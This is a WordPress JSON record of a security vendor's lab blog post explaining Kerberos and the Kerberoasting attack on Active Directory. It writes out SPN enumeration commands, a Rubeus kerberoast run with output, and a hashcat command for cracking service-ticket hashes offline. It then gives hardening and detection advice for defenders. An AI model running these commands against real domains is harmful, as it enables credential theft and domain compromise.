{"id":2172,"date":"2024-09-25T12:05:31","date_gmt":"2024-09-25T12:05:31","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=2172"},"modified":"2025-07-29T03:24:04","modified_gmt":"2025-07-29T03:24:04","slug":"active-directory-penetration-dojo-spn-tickets-and-kerberoasting","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/active-directory-penetration-dojo-spn-tickets-and-kerberoasting\/","title":{"rendered":"Active Directory Penetration Dojo \u2013 SPN Tickets and Kerberoasting"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Dojo5-1024x1024.webp\" alt=\"Active Directory Penetration Dojo \u2013 SPN Tickets and Kerberoasting\" class=\"wp-image-2176\" srcset=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Dojo5-1024x1024.webp 1024w, https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Dojo5-300x300.webp 300w, https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Dojo5-150x150.webp 150w, https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Dojo5-768x768.webp 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Hi everyone, we\u2019ve discussed basics of Active Directory and different servers in AD in previous blog posts of this series. If you\u2019ve not yet read that, please find that here in <a href=\"https:\/\/lmntrix.com\/lab\/active-directory-penetration-dojo-setup-of-ad-penetration-lab-part-1\/\">[Part 1]<\/a>&nbsp;and <a href=\"https:\/\/lmntrix.com\/lab\/active-directory-penetration-dojo-setup-of-ad-penetration-lab-part-2\/\">[Part 2]<\/a>. We\u2019ve also understood trust relationships in AD environment which can be checked in the blogpost <a href=\"https:\/\/lmntrix.com\/lab\/active-directory-penetration-dojo-creation-of-forest-trust-part-3\/\">[here]<\/a>. 
Finally, we covered Active Directory enumeration in part 4 of this series <a href=\"https:\/\/lmntrix.com\/lab\/active-directory-penetration-dojo-ad-environment-enumeration-1\/\">[here]<\/a>.<\/p>\n\n\n\n<p>In this post, we\u2019ll discuss how to enumerate an Active Directory domain for service accounts and perform a Kerberoasting attack.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Kerberos<\/strong><strong>:<\/strong><\/h2>\n\n\n\n<p>To understand Kerberos-based attacks, let\u2019s first understand what Kerberos is and how it works in Microsoft Active Directory environments. Kerberos is the default authentication protocol used by Microsoft Windows. The Kerberos authentication protocol was named after Cerberus, the big three-headed dog who guards the gates to the Underworld according to myth. MIT used this name and a similar kind of logo for the authentication protocol. In Windows 2000, Microsoft introduced their version of Kerberos, and it became the standard for SSO for other applications as well. 
Thanks to its strong cryptography and third-party ticket authorization, it is certainly an effective authentication protocol, but there are a few flaws in its design, which we will discuss so that we can understand the different attacks that abuse the Kerberos authentication flow.<\/p>\n\n\n\n<p>In Kerberos, there is a Key Distribution Centre that includes the components below:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Authentication server (AS)<\/strong> \u2013 <em>Performs the initial authentication and issues the ticket for the Ticket Granting Service<\/em><\/li>\n\n\n\n<li><strong>Database<\/strong> \u2013 <em>Used by the authentication server to verify the access rights of users<\/em><\/li>\n\n\n\n<li><strong>Ticket Granting Server (TGS)<\/strong> \u2013 <em>Issues the ticket for the servers<\/em><\/li>\n<\/ol>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"312\" height=\"246\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/1-37.webp\" alt=\"\" class=\"wp-image-2173\"\/><\/figure>\n<\/div>\n\n\n<p>For Kerberos authentication, both the client and the server must be verified. Let us suppose that a client wants to connect to a target server and access a particular service on it. The client will first verify itself to the KDC (Key Distribution Centre).<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><u>Below are the overall steps to be successfully verified by the KDC:<\/u><\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The client first connects with the Authentication Server<\/li>\n\n\n\n<li>The client then presents its User ID to the Authentication Server<\/li>\n\n\n\n<li>The client requests a ticket for the targeted server<\/li>\n<\/ul>\n\n\n\n<p>Let\u2019s look at this in detail. The request is partially encrypted with a secret key derived from the requesting user\u2019s password. This is done so that the cleartext password isn\u2019t sent over the insecure network. 
The Authentication Server verifies the user by using the password to decrypt the request.<\/p>\n\n\n\n<p>Once the client is verified, the Authentication Server sends the client a <strong>TGT<\/strong> (<strong>Ticket Granting Ticket<\/strong>), which is encrypted with a different secret key. The client now has the <strong>TGT<\/strong>, and if the user wants to access a particular service running on the target server, the client contacts the <strong>TGS<\/strong>, sending its <strong>TGT<\/strong> with the request to access the target server.<\/p>\n\n\n\n<p>Once the <strong>TGS<\/strong> receives the <strong>TGT<\/strong>, it decrypts it with the secret key that it shares with the Authentication Server and issues a token for the client, which it encrypts with another key. This third key is shared between the TGS and the targeted server.<\/p>\n\n\n\n<p>Finally, the client sends the service ticket (token) to the targeted server, which decrypts the token with the key it shares with the TGS. The client can now use the targeted server.<\/p>\n\n\n<div class=\"wp-block-image size-full wp-image-2515\">\n<figure class=\"aligncenter\"><img decoding=\"async\" width=\"507\" height=\"317\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/2-36.webp\" alt=\"\" class=\"wp-image-2174\"\/><figcaption class=\"wp-element-caption\">Figure 1. 
Kerberos Authentication process<\/figcaption><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading\"><strong>Keys that are used in the Kerberos authentication process<\/strong><\/h2>\n\n\n\n<p>Three different secret keys are used in the Kerberos authentication process.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>The first key, between the client and the AS, is based on the client\u2019s password.<\/li>\n\n\n\n<li>The AS and the TGS share another secret key.<\/li>\n\n\n\n<li>The TGS and the targeted server share the third key.<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Introduction to Kerberoasting<\/strong><\/h2>\n\n\n\n<p>In a Kerberoasting attack, an attacker steals a service ticket that is encrypted with RC4 and brute-forces its hash offline to extract the password. The Kerberoasting attack takes advantage of legacy Active Directory support for older Windows clients, the type of encryption used, and the key material used to encrypt and sign Kerberos tickets.<\/p>\n\n\n\n<p>In Figure 1 (Kerberos authentication process), the Kerberoasting attack focuses on step 3, where the user gets the service ticket for the target service. The attacker does not connect to the target server; instead, they retrieve the service ticket for the target service and perform a brute-force attack on it to crack the password of the service account running the service on the target server.<\/p>\n\n\n<div class=\"wp-block-image size-full wp-image-2516\">\n<figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"674\" height=\"421\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/3-35.webp\" alt=\"\" class=\"wp-image-2175\"\/><figcaption class=\"wp-element-caption\">Figure 2. 
Kerberoasting<\/figcaption><\/figure>\n<\/div>\n\n\n<p>When a domain account is configured to run a service in the environment, such as in the case of Microsoft SQL, an SPN (Service Principal Name) is used in the domain to associate the service with a login account. When a user needs to use the specific resource in the domain, they receive a Kerberos ticket signed with the NTLM hash of the account that is running the service.<\/p>\n\n\n\n<p>Note that any valid Active Directory domain user can request a ticket for the SPN of any registered service (mostly we have seen MS SQL and IIS), and once the Kerberos ticket is received, it can be cracked offline. This is significant because in most cases, a service account is at least an administrator on the target server.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>SPN (Service Principal Name)<\/strong><\/h2>\n\n\n\n<p>In Windows environments, a service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name. Below is the reference for more details on service principal names:<\/p>\n\n\n\n<figure class=\"wp-block-embed\"><div class=\"wp-block-embed__wrapper\">\nhttps:\/\/docs.microsoft.com\/en-us\/windows\/win32\/ad\/service-principal-names\n<\/div><\/figure>\n\n\n\n<p>The first step in the Kerberoasting attack is to find all the Service Principal Names in the environment. 
This can be done by using raw LDAP queries, by using utilities such as setspn (a built-in utility), or by using third-party\/open-source scripts, which we\u2019ll discuss in the next section.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Discovering SPN Ticket<\/strong><\/h2>\n\n\n\n<p>A very simple way to discover all the SPN tickets present in a Windows Active Directory environment is to use the setspn utility by entering the command below:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">setspn&nbsp;-t&nbsp;domainname&nbsp;-q&nbsp;*\/*<\/pre>\n\n\n\n<p><strong><u>Note<\/u><\/strong><strong>: setspn<\/strong> is a native Windows binary which can be used to retrieve the mapping between user accounts and services. This utility can add, delete or view SPN registrations.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><u>SPN Discovery using LDAP query:<\/u><\/strong><\/h3>\n\n\n\n<p>SPNs can also be queried using LDAP queries. The query to enumerate SPNs is as follows:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">(&amp;(objectClass=user)(objectcategory=user)(servicePrincipalName=*))<\/pre>\n\n\n\n<p>Note: <em>SPNs can also be queried with the dsquery utility, using the command below:<\/em><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">dsquery&nbsp;*&nbsp;\"ou=domain&nbsp;controllers,dc=yourdomain,dc=com\"&nbsp;-filter&nbsp;\"(&amp;(objectcategory=computer)(servicePrincipalName=*))\"&nbsp;-attr&nbsp;distinguishedName&nbsp;servicePrincipalName&nbsp;&gt;&nbsp;list_of_spns.txt<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><u>SPN Discovery using the built-in SetSPN utility:<\/u><\/strong><\/h3>\n\n\n\n<p>Below is what the output from the SetSPN utility looks like.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"641\" height=\"259\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Picture4.webp\" alt=\"\" 
class=\"wp-image-2177\"\/><\/figure>\n<\/div>\n\n\n<p>As you can see in the screenshot above, the SPN is for SQL Server, which is running under the account <strong><em>SVC_SQL_Service<\/em><\/strong>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><u>Additionally, a few other tools can also be used for SPN discovery, such as:<\/u><\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Rubeus (<a href=\"https:\/\/github.com\/GhostPack\/Rubeus\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/GhostPack\/Rubeus<\/a>)<\/li>\n\n\n\n<li>GetUserSPNs from Impacket<\/li>\n\n\n\n<li>PowerShell AD Recon<\/li>\n\n\n\n<li>Empire<\/li>\n\n\n\n<li>PowerShellery (<a href=\"https:\/\/github.com\/nullbind\/Powershellery\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/nullbind\/Powershellery<\/a>), etc.<\/li>\n<\/ul>\n\n\n\n<p>Once the enumeration of service accounts and SPNs is done, the attacker requests Kerberos ticket-granting service tickets for the services, extracts the hashes from memory, and saves them for later offline brute force.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Performing Kerberoasting Attack<\/strong><\/h2>\n\n\n\n<p>The service account <a href=\"mailto:SVC_SQL_Service@scriptdotsh.local\">SVC_SQL_Service@scriptdotsh.local<\/a> is a domain user with domain admin privileges that runs the SQL Server service. Let us perform the Kerberoasting attack to request the ticket for it. 
To perform the Kerberoasting attack, we can use tools such as Rubeus (<a href=\"https:\/\/github.com\/GhostPack\/Rubeus\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/GhostPack\/Rubeus<\/a>), which can fully automate this process.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">PS&gt;&nbsp;.\\Rubeus.exe&nbsp;kerberoast&nbsp;\/simple&nbsp;\/outfile:myhash.txt\n\n[*]&nbsp;Action:&nbsp;Kerberoasting\n\n[*]&nbsp;NOTICE:&nbsp;AES&nbsp;hashes&nbsp;will&nbsp;be&nbsp;returned&nbsp;for&nbsp;AES-enabled&nbsp;accounts.\n\n[*]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Use&nbsp;\/ticket:X&nbsp;or&nbsp;\/tgtdeleg&nbsp;to&nbsp;force&nbsp;RC4_HMAC&nbsp;for&nbsp;these&nbsp;accounts.\n\n[*]&nbsp;Searching&nbsp;the&nbsp;current&nbsp;domain&nbsp;for&nbsp;Kerberoastable&nbsp;users\n\n[*]&nbsp;Total&nbsp;kerberoastable&nbsp;users&nbsp;:&nbsp;2\n\n[*]&nbsp;Hash&nbsp;written&nbsp;to&nbsp;C:\\Rubues\\myhash.txt&nbsp;\n\n[*]&nbsp;Roasted&nbsp;hashes&nbsp;written&nbsp;to&nbsp;:&nbsp;C:\\Rubues\\myhash.txt<\/pre>\n\n\n\n<p>For demonstration, we hosted the <a href=\"https:\/\/github.com\/EmpireProject\/Empire\/blob\/master\/data\/module_source\/credentials\/Invoke-Kerberoast.ps1\" target=\"_blank\" rel=\"noopener\">Kerberoast.ps1 script<\/a> on a remote system and used PowerShell to run it and get the ticket in hashcat format.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"579\" height=\"577\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Picture5.webp\" alt=\"\" class=\"wp-image-2178\" srcset=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Picture5.webp 579w, https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Picture5-300x300.webp 300w, https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Picture5-150x150.webp 150w\" sizes=\"(max-width: 579px) 100vw, 579px\" \/><\/figure>\n<\/div>\n\n\n<p>In the output, we have the ticket in hashcat 
format that we can crack in hashcat.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Cracking the ticket offline:<\/strong><\/h2>\n\n\n\n<p>Once the Kerberoasting is done, the ticket can be saved in a file, for example myhash.txt. Any Kerberos ticket gathered by the GetUserSPNs script is directly crackable with hashcat without any additional conversion. Let\u2019s open hashcat and type the command.<\/p>\n\n\n\n<p><strong><u>Command<\/u><\/strong><strong>:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"575\" height=\"455\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Picture6.webp\" alt=\"\" class=\"wp-image-2179\"\/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">hashcat&nbsp;-m&nbsp;13100&nbsp;-a&nbsp;0&nbsp;myhash.txt&nbsp;rockyou.txt&nbsp;-o&nbsp;pass.txt<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><u>For those who have never used hashcat, the command above breaks down as follows:<\/u><\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>hashcat: The executable file being run on Linux<\/li>\n\n\n\n<li>-m 13100: Specifies the hash type; this is called a mask. In this case we\u2019re instructing it to use Kerberos 5, etype 23, TGS-REP.<\/li>\n\n\n\n<li>myhash.txt: This is the hash file; it could be called anything. 
We\u2019ve named the file myhash.txt, as shown in the screen capture above.<\/li>\n\n\n\n<li>rockyou.txt: This is the wordlist we\u2019re going to try against the hash to extract the cleartext password.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Cleartext password:<\/strong><\/h2>\n\n\n\n<p>Once hashcat is able to crack the password, we\u2019ll see the status as cracked, and the password appears highlighted in the output file.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"539\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Picture7.webp\" alt=\"\" class=\"wp-image-2180\"\/><\/figure>\n<\/div>\n\n\n<p>Now that the password is cracked, the attacker can use the credentials of the account SVC_SQL_Service to authenticate to any resources this service account has access to, allowing them to compromise data, escalate privileges, and perform lateral movement in the Active Directory environment. In this demonstration, the service account is a domain administrator, so it can be used to perform DCSync and dump the credentials of all domain users, and also to create a golden ticket for persistence. 
We\u2019ll discuss these attacks in upcoming posts.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Best practices for Service Accounts:<\/strong><\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>It is always recommended to prevent domain admin accounts from being used as service accounts.<\/li>\n\n\n\n<li>Since the attack works by cracking the service account hash, it is recommended to use complex passwords and other credential best practices that make brute-forcing with a standard wordlist significantly more time-consuming.<\/li>\n\n\n\n<li>Also ensure the passwords for service accounts are changed on a regular basis.<\/li>\n\n\n\n<li>Make sure to restrict the use of insecure algorithms like RC4 in Kerberos, especially for service accounts. Instead, configure service accounts to negotiate using AES-128 and AES-256 encryption algorithms only.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Detection of Kerberoasting Attacks<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><em>Audit Service Ticket Operations.<\/em><\/strong><\/h3>\n\n\n\n<p>To detect Kerberoasting attacks, we need to enable Kerberos service ticket request logging and monitor activity such as domain user accounts requesting large numbers of service tickets (Windows Event ID 4769).<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><em>Using AD Decoy Accounts<\/em><\/strong><\/h3>\n\n\n\n<p>Similar to what we do with our <a href=\"https:\/\/lmntrix.com\/\">Active Defense<\/a> using the <a href=\"https:\/\/lmntrix.com\/lmntrix-deceive\/\">LMNTRIX XDR Deceive element<\/a>, blue teams can set traps within the organization\u2019s Active Directory environment by using Active Directory decoy accounts and enabling audit logging on them. These decoy accounts can act as normal service accounts and generate an alert when an interaction occurs. 
The concept is similar to the Server Decoys, which immobilize attackers doing reconnaissance through Active Directory with legitimate service names.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Next Steps<\/strong><\/h2>\n\n\n\n<p>As enterprises grow and evolve, their Active Directory can get very complex and difficult to maintain. The constantly evolving security enhancements and configuration options result in enterprises failing to correctly maintain their Active Directory environments.<\/p>\n\n\n\n<p>Our <a href=\"https:\/\/lmntrix.com\/active-directory-security-assessment\/\">Active Directory Security Assessment<\/a> helps enterprises enhance the processes, configurations, and security and monitoring controls necessary to effectively secure an Active Directory environment. It was developed based on extensive red teaming and <a href=\"https:\/\/lmntrix.com\/\">Active Defense<\/a> experience from our <a href=\"https:\/\/lmntrix.com\/cdc\/\">cyber defense centre<\/a> defending clients around the globe.<\/p>\n\n\n\n<p>For more information <a href=\"https:\/\/lmntrix.com\/contact\/\">contact us<\/a>.<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hi everyone, we&rsquo;ve discussed basics of Active Directory and different servers in AD in previous blog posts of this series. If you&rsquo;ve not yet read that, please find that here in [Part 1]&nbsp;and [Part 2]. We&rsquo;ve also understood trust relationships in AD environment which can be checked in the blogpost [here]. 
Finally, we also did [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2176,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-2172","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2172","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=2172"}],"version-history":[{"count":3,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2172\/revisions"}],"predecessor-version":[{"id":4211,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2172\/revisions\/4211"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/2176"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=2172"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/categories?post=2172"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=2172"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}